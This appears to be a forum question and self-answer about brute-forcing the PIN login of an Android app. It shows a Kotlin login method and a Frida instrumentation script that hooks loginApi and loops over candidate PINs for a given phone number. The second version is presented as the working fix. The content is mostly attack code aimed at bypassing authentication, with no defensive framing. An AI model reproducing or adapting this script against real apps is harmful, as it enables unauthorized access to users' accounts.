I am facing trouble while trying to brute-force on an app. The code of the method is as below.
private fun loginApi(phone: String, pin: String) {
if (firebase_token.isEmpty()) {
//
}else {
showDialog()
//
// Code to call api and perform authentication
}
I tried the below code, but that isn't working.
Java.perform(function () {
var OTPActivity = Java.use('com.example.example.Getstarted.FragmentOtpVerification');
OTPActivity.loginApi.overload("java.lang.String", "java.lang.String").implementation = function(phone_no, pin){
for(var i=1140; i<1151; i++)
{
send(i);
var my_phone = string_class.$new('/*Number over here*/');
var my_pin = string_class.$new(i);
var result = this.loginApi(my_phone, my_pin);
console.log(result);
}
console.log('Done:');
};
});
I am trying to brute-force using this method. Any help will be appreciated.
I managed to bruteforce the method by just manipulating the Int to String conversion statement. The reeditted code can be shown below:
Java.perform(function () {
var OTPActivity = Java.use('com.example.example.Getstarted.FragmentOtpVerification');
OTPActivity.loginApi.overload("java.lang.String", "java.lang.String").implementation = function(phone_no, pin){
for(var i=1140; i<1151; i++)
{
send(i);
var my_phone = string_class.$new('/*Number over here*/');
var my_pin = i + ""; /* Changed over here. */
var result = this.loginApi(my_phone, my_pin);
console.log(result);
}
console.log('Done:');
};
});